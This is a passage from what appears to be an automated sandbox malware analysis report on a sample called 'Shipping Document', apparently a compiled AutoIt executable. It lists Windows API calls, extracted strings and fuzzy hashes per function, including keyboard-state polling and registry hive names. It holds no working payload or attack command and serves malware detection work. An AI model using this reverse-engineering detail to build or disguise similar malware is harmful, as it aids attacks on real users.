                              • SelectObject.GDI32(00000006,?), ref: 01037783
                              • DeleteObject.GDI32(?), ref: 0103778C
                              • DeleteDC.GDI32(00000006), ref: 01037793
                              • ReleaseDC.USER32(00000000,?), ref: 0103779E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                              • String ID: (
                              • API String ID: 2598888154-3887548279
                              • Opcode ID: 360143d4c08cc778a9c5b562fdb05276950122c973d6d2a48b0bcc768ed47453
                              • Instruction ID: d60a38849504d3118e6f4c6a3b5574a47726b163e3673341c937bc56070afd35
                              • Opcode Fuzzy Hash: 360143d4c08cc778a9c5b562fdb05276950122c973d6d2a48b0bcc768ed47453
                              • Instruction Fuzzy Hash: 7A514CB5900209EFDB25CFA8C984EAEBBF9FF88710F14851DF99997210D735A840CB60
                              APIs
                              • LoadStringW.USER32(00000066,?,00000FFF,0104FB78), ref: 0102A0FC
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0102A11E
                              • __swprintf.LIBCMT ref: 0102A177
                              • __swprintf.LIBCMT ref: 0102A190
                              • _wprintf.LIBCMT ref: 0102A246
                              • _wprintf.LIBCMT ref: 0102A264
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: LoadString__swprintf_wprintf$_memmove
                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 311963372-2391861430
                              • Opcode ID: d73e770a65933691dd0ac08a64f051d1a8de13e031fd83195e160b9b41c3db8e
                              • Instruction ID: afde35f4e4c6d853ac188b1ba9d3d66ffe1917dc06c6359124960b5d41f25884
                              • Opcode Fuzzy Hash: d73e770a65933691dd0ac08a64f051d1a8de13e031fd83195e160b9b41c3db8e
                              • Instruction Fuzzy Hash: E6516F7290421AAADF15FBE4CE86EEEB779AF04300F1001A9F54567051DB3A6F48EF60
                              APIs
                                • Part of subcall function 00FE0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00FC6C6C,?,00008000), ref: 00FE0BB7
                                • Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FC6D0D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC6E5A
                                • Part of subcall function 00FC59CD: _wcscpy.LIBCMT ref: 00FC5A05
                                • Part of subcall function 00FE387D: _iswctype.LIBCMT ref: 00FE3885
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                              • API String ID: 537147316-1018226102
                              • Opcode ID: cf5eb62e019fe3c71687f94638bd408282c36129a3f6e36be678a6bd4da92ba8
                              • Instruction ID: 6e1ece3c943f28b6cf53d242f5158281c296860b38ecdc45df93c82c972a3755
                              • Opcode Fuzzy Hash: cf5eb62e019fe3c71687f94638bd408282c36129a3f6e36be678a6bd4da92ba8
                              • Instruction Fuzzy Hash: 7F0289315083429FC724EF24C982EAFBBE5AF98754F04091DF5C6972A1DB34E949EB42
                              APIs
                              • _memset.LIBCMT ref: 00FC45F9
                              • GetMenuItemCount.USER32(01086890), ref: 00FFD7CD
                              • GetMenuItemCount.USER32(01086890), ref: 00FFD87D
                              • GetCursorPos.USER32(?), ref: 00FFD8C1
                              • SetForegroundWindow.USER32(00000000), ref: 00FFD8CA
                              • TrackPopupMenuEx.USER32(01086890,00000000,?,00000000,00000000,00000000), ref: 00FFD8DD
                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FFD8E9
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                              • String ID:
                              • API String ID: 2751501086-0
                              • Opcode ID: a1f7073be8a628b4d687ae60fb8e6a181542e6c64f368f73de1e8ba4f4e03150
                              • Instruction ID: 4b7b10187384f3e656c11ef5053f6c669536fa1c44fc0a11f66a106dabd541d9
                              • Opcode Fuzzy Hash: a1f7073be8a628b4d687ae60fb8e6a181542e6c64f368f73de1e8ba4f4e03150
                              • Instruction Fuzzy Hash: 1F710972A4121ABBEB309F54DD89FBABF65FF05374F200216F6156A1E0C7B56810EB90
                              APIs
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,01040038,?,?), ref: 010410BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                              • API String ID: 3964851224-909552448
                              • Opcode ID: 1ffae9be09d4efba0875aef29fe363c1f2783ee63a458c176b9ec032f13ee201
                              • Instruction ID: 72bf68602e79e9a6c75d958706e7d7191a2cdcde38d3c532f58aa9a268f4531c
                              • Opcode Fuzzy Hash: 1ffae9be09d4efba0875aef29fe363c1f2783ee63a458c176b9ec032f13ee201
                              • Instruction Fuzzy Hash: 93414BB055028B9BCF21EF94DE81AEE3764BF45310F404464FCD19B292DF75A99ACBA0
                              APIs
                                • Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66
                                • Part of subcall function 00FC7A84: _memmove.LIBCMT ref: 00FC7B0D
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 010255D2
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 010255E8
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 010255F9
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0102560B
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0102561C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: SendString$_memmove
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 2279737902-1007645807
                              • Opcode ID: 076626d24b51d7ae3fc6099ad9c9712c75af5cde4a78c9333833585a3e572e6c
                              • Instruction ID: 55b072a02d98347341838f9420fa97aa93b28ba64655021a5e456c685e889e1f
                              • Opcode Fuzzy Hash: 076626d24b51d7ae3fc6099ad9c9712c75af5cde4a78c9333833585a3e572e6c
                              • Instruction Fuzzy Hash: A311E620A5026AB9E720BA66DC8ADFFBF7CEF85B00F04445DB485A7091DEA41D04C9A4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 208665112-3771769585
                              • Opcode ID: 8b2911af4932a9fac60058b6f3c6f0f97af18d3c17ff9581cf6446dd31a47ef7
                              • Instruction ID: 6847a996192befbdb983c3f212e0ff5e8481720a203ba18888abe58bd2b4efd2
                              • Opcode Fuzzy Hash: 8b2911af4932a9fac60058b6f3c6f0f97af18d3c17ff9581cf6446dd31a47ef7
                              • Instruction Fuzzy Hash: D8112775A04125ABEB20EB29ED49EDE77FCEF00710F0401BAF584D6041EFB99A819751
                              APIs
                              • timeGetTime.WINMM ref: 0102521C
                                • Part of subcall function 00FE0719: timeGetTime.WINMM(?,75A4B400,00FD0FF9), ref: 00FE071D
                              • Sleep.KERNEL32(0000000A), ref: 01025248
                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0102526C
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0102528E
                              • SetActiveWindow.USER32 ref: 010252AD
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 010252BB
                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 010252DA
                              • Sleep.KERNEL32(000000FA), ref: 010252E5
                              • IsWindow.USER32 ref: 010252F1
                              • EndDialog.USER32(00000000), ref: 01025302
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                              • String ID: BUTTON
                              • API String ID: 1194449130-3405671355
                              • Opcode ID: c3ace3f4bae6ea409589f3ae5b8a200f922b674804c422eaf7f5db77af8732e3
                              • Instruction ID: 0fafb17964c58a76fadb44a109ed7244ff2bdab15a6413b897ce9df2e65a7ca2
                              • Opcode Fuzzy Hash: c3ace3f4bae6ea409589f3ae5b8a200f922b674804c422eaf7f5db77af8732e3
                              • Instruction Fuzzy Hash: EC21F6B4204346EFE7205B38EEC8B6E3BA9EB0A356F501058F1C1851D8DBAF9C048775
                              APIs
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              • CoInitialize.OLE32(00000000), ref: 0102D855
                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0102D8E8
                              • SHGetDesktopFolder.SHELL32(?), ref: 0102D8FC
                              • CoCreateInstance.OLE32(01052D7C,00000000,00000001,0107A89C,?), ref: 0102D948
                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0102D9B7
                              • CoTaskMemFree.OLE32(?,?), ref: 0102DA0F
                              • _memset.LIBCMT ref: 0102DA4C
                              • SHBrowseForFolderW.SHELL32(?), ref: 0102DA88
                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0102DAAB
                              • CoTaskMemFree.OLE32(00000000), ref: 0102DAB2
                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0102DAE9
                              • CoUninitialize.OLE32(00000001,00000000), ref: 0102DAEB
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                              • String ID:
                              • API String ID: 1246142700-0
                              • Opcode ID: cc4643ccf340607774e42d7e84db2d2df67ed38fa461bb87724687590bb04479
                              • Instruction ID: 08b293327973a913f87daf22a6534c3f09da8d61233384baf4bafd90870b2b03
                              • Opcode Fuzzy Hash: cc4643ccf340607774e42d7e84db2d2df67ed38fa461bb87724687590bb04479
                              • Instruction Fuzzy Hash: ACB14E75A00119AFDB04DFA8C989EAEBBF9FF88300B048499F949DB251DB75ED41CB50
                              APIs
                              • GetKeyboardState.USER32(?), ref: 010205A7
                              • SetKeyboardState.USER32(?), ref: 01020612
                              • GetAsyncKeyState.USER32(000000A0), ref: 01020632
                              • GetKeyState.USER32(000000A0), ref: 01020649
                              • GetAsyncKeyState.USER32(000000A1), ref: 01020678
                              • GetKeyState.USER32(000000A1), ref: 01020689
                              • GetAsyncKeyState.USER32(00000011), ref: 010206B5
                              • GetKeyState.USER32(00000011), ref: 010206C3
                              • GetAsyncKeyState.USER32(00000012), ref: 010206EC
                              • GetKeyState.USER32(00000012), ref: 010206FA
                              • GetAsyncKeyState.USER32(0000005B), ref: 01020723
                              • GetKeyState.USER32(0000005B), ref: 01020731
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: df8bc09ef03b926bc6bebdb71d288c965bc24dab9f6e7acb408edab1e2252b91
                              • Instruction ID: 66a21cb796df45eb8ef590b6ec8212aef2453db4e1fbf7c00121cc14761ad38f
                              • Opcode Fuzzy Hash: df8bc09ef03b926bc6bebdb71d288c965bc24dab9f6e7acb408edab1e2252b91
                              • Instruction Fuzzy Hash: 5A512C70A047B819FB75DBB488547EBBFF49F01280F0845C9DAC2561C6DA74978CCB61
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 0101C746
                              • GetWindowRect.USER32(00000000,?), ref: 0101C758
                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0101C7B6
                              • GetDlgItem.USER32(?,00000002), ref: 0101C7C1
                              • GetWindowRect.USER32(00000000,?), ref: 0101C7D3
                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0101C827
                              • GetDlgItem.USER32(?,000003E9), ref: 0101C835
                              • GetWindowRect.USER32(00000000,?), ref: 0101C846
                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0101C889
                              • GetDlgItem.USER32(?,000003EA), ref: 0101C897
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0101C8B4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0101C8C1
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 0bd9cdf719ab75e41f7120c33cf44fc356ec72beb7f85186aa5df910b0b88485
                              • Instruction ID: 2de1ac9efd6ceed0b39bc83aaefdd35b4c3faddc74fe05914ec970cef2eb9394
                              • Opcode Fuzzy Hash: 0bd9cdf719ab75e41f7120c33cf44fc356ec72beb7f85186aa5df910b0b88485
                              • Instruction Fuzzy Hash: A85153B5B00205AFEB18CF7CDE89AAEBBB5FB88310F14816DF555D6294D775D9008B10
                              APIs
                                • Part of subcall function 00FC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FC2036,?,00000000,?,?,?,?,00FC16CB,00000000,?), ref: 00FC1B9A
                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FC20D3
                              • KillTimer.USER32(-00000001,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FC216E
                              • DestroyAcceleratorTable.USER32(00000000), ref: 00FFBEF6
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF27
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF3E
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF5A
                              • DeleteObject.GDI32(00000000), ref: 00FFBF6C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                              • String ID:
                              • API String ID: 641708696-0
                              • Opcode ID: 92e4d7d97726e3a9be57c7786365f8788bbe16765134fb43bdc1cebb82b5dfc5
                              • Instruction ID: 19a7b43bc52c8e53eac19e692d75b794347a186d84ddf40db5afcd7a469abd83
                              • Opcode Fuzzy Hash: 92e4d7d97726e3a9be57c7786365f8788bbe16765134fb43bdc1cebb82b5dfc5
                              • Instruction Fuzzy Hash: D861A075904606DFCB35AF18CA89B3977F1FF40322F14451DE5C2865A8C77AA891EF80
                              APIs
                                • Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC
                              • GetSysColor.USER32(0000000F), ref: 00FC21D3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ColorLongWindow
                              • String ID:
                              • API String ID: 259745315-0
                              • Opcode ID: 7439157c6fbf389b4d71c134bc677e39051ac3385bebad3b3781dd1461f21c74
                              • Instruction ID: d5ac86ca2419e936a82a37b2bb9cf8addb196fe772f61dcd173454c3dfb59a30
                              • Opcode Fuzzy Hash: 7439157c6fbf389b4d71c134bc677e39051ac3385bebad3b3781dd1461f21c74
                              • Instruction Fuzzy Hash: 1D4125354001459FEB219F28DA89FF93B65EB06330F184359FEA58A1E6C7328C42FB60
                              APIs
                              • CharLowerBuffW.USER32(?,?,0104F910), ref: 0102AB76
                              • GetDriveTypeW.KERNEL32(00000061,0107A620,00000061), ref: 0102AC40
                              • _wcscpy.LIBCMT ref: 0102AC6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy
                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 2820617543-1000479233
                              • Opcode ID: 64a2b27c052fb48ac07573cba4b0ec2e4e1a5d29163275c732eda40279f70e37
                              • Instruction ID: 0cb85804919a9f58134a4dba3fd39422f0f173379a0cf1a79cac068c401ebd03
                              • Opcode Fuzzy Hash: 64a2b27c052fb48ac07573cba4b0ec2e4e1a5d29163275c732eda40279f70e37
                              • Instruction Fuzzy Hash: 0951AA30208312DBC720EF18CD82EAEB7A5EF84310F14481DF5C69B6A2DF75A949DB52
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __i64tow__itow__swprintf
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 421087845-2263619337
                              • Opcode ID: f9ff544524f270f3c94ce1225122c6879fa2fef49d5fdcb828f3aeeb251bfde1
                              • Instruction ID: e3fb74a36be0082ae174813839661ceeb4ef0febfc0702000e23c11254407534
                              • Opcode Fuzzy Hash: f9ff544524f270f3c94ce1225122c6879fa2fef49d5fdcb828f3aeeb251bfde1
                              • Instruction Fuzzy Hash: 47411672A0420AABDB349B35DD46F7A73E8EF44310F20446EE649D7251EEB59941EB10
                              APIs
                              • _memset.LIBCMT ref: 010473D9
                              • CreateMenu.USER32 ref: 010473F4
                              • SetMenu.USER32(?,00000000), ref: 01047403
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01047490
                              • IsMenu.USER32(?), ref: 010474A6
                              • CreatePopupMenu.USER32 ref: 010474B0
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010474DD
                              • DrawMenuBar.USER32 ref: 010474E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
